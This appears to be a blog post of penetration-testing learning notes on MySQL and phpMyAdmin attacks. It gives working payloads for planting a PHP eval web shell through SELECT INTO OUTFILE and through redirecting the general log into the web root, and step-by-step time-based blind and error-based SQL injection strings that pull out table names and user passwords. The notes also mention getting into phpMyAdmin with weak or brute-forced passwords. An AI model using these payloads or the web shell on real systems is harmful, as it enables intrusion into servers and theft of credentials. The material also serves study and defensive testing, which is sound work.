2019-9-9: penetration testing learning notes: phpMyAdmin getshell methods, time-based blind injection, error-based injection

phpMyAdmin getshell methods
1. In the import/export settings, check the global variable that restricts file import and export: show variables like '%secure_file_priv%';
2. If secure_file_priv is empty or not set, the folder can be abused to write a one-line shell: select "<?php @eval($_POST[s]);?>" into outfile "/var/www/html/xx.php"

Getshell via the log file: MySQL versions above 5.0 can create a log file whose location is set by a global variable, and the file can be both read and written.
Common log files are divided into business logs and system logs; the log file is what is used for the phpMyAdmin getshell.
1. Log in to phpMyAdmin through a weak or brute-forced password and execute select @@datadir; from the data directory's location, guess the web root, e.g. D:\phpstudy_pro\WWW
2. Check the logging status: show variables like '%general%'
3. Turn on logging, then change the path and file name of the log: set global general_log = 'ON'
4. Point the log file at the guessed web root: set global general_log_file = 'D:/phpstudy_pro/www/log.php'
5. Write the one-line shell, which is recorded into the log file: select "<?php @eval($_POST[s]);?>"

Time-based SQL injection
Inject a specific function into the current page so that the database waits a certain time before the page is returned; the delay is what reveals the result.

Functions
sleep(): pauses the database for the given number of seconds.
benchmark(): can be used to test the execution speed of certain operations. Parameter 1 is the number of times to execute, parameter 2 is the expression to execute. The expression may be any scalar expression, such as a subquery that returns a scalar or a scalar function, e.g. benchmark(100, 100*100).

Procedure
1. Find the injection point: 1' and sleep(3)%23
2. Obtain the current database name: and if(ascii(substring(database(),1,1))=114, sleep(5), 'bye'); only a correct guess makes the page sleep.
3. Obtain the tables: and if(ascii(substring((select distinct table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=114, sleep(5), 'bye'); only a correct guess sleeps, and this yields table names such as users.
4. Obtain a table's fields: and if(ascii(substring((select distinct column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),1,1))=114, sleep(5), 'bye') (if quotes are filtered, the table name has to be hex-encoded); only a correct guess sleeps, and this yields the useful columns in the table, such as user and password.
5. Obtain the table contents: and if(ascii(substring((select concat(user,0x7e,password) from users limit 0,1),1,1))=114, sleep(5), 'bye'); only a correct guess sleeps, and this yields the contents of the table.
6. Crack the password hash, scan for directories, log in to the back end.

Error-based SQL injection
Exploit certain functions that raise errors to construct a payload; after the database executes it and raises the error, the required data is carried out in the error message, which achieves the attacker's goal.

Error functions
1. extractvalue(xml, xpath): extractvalue() is an XPath function for querying and modifying XML documents that MySQL introduced after 5.1. Its first parameter is the XML document, which can be given as an arbitrary number. The fixed payload for retrieving data with extractvalue() is: or extractvalue(1, concat('#', (select * from (select ...) a))) #
2. updatexml(parameter 1, parameter 2, parameter 3): updatexml() is likewise a MySQL XPath function for querying and modifying XML documents; it changes the value of the matching part of the XML document. Parameter 1 is the XML document, parameter 2 is the XPath format string, and parameter 3 is the string that replaces what the format string matched.
The fixed payload for retrieving data with updatexml() is: or updatexml(1, concat('#', (select * from (select ...) a)), 0) #
The error messages returned by extractvalue() and updatexml() are limited to 32 characters of output.
3. floor(): floor() returns the largest integer less than or equal to its argument. Used together with count(), which counts rows, and rand(), which generates a random number between 0 and 1 (once a seed is given, the sequence becomes fixed), plus group by, the resulting error can achieve the same goal as the functions above:
(select 1 from (select count(*), concat_ws('-', (select database()), floor(rand()*2)) as a from information_schema.tables group by a) b) where username='admin'

Origin www.cnblogs.com/sym945/p/11725757.html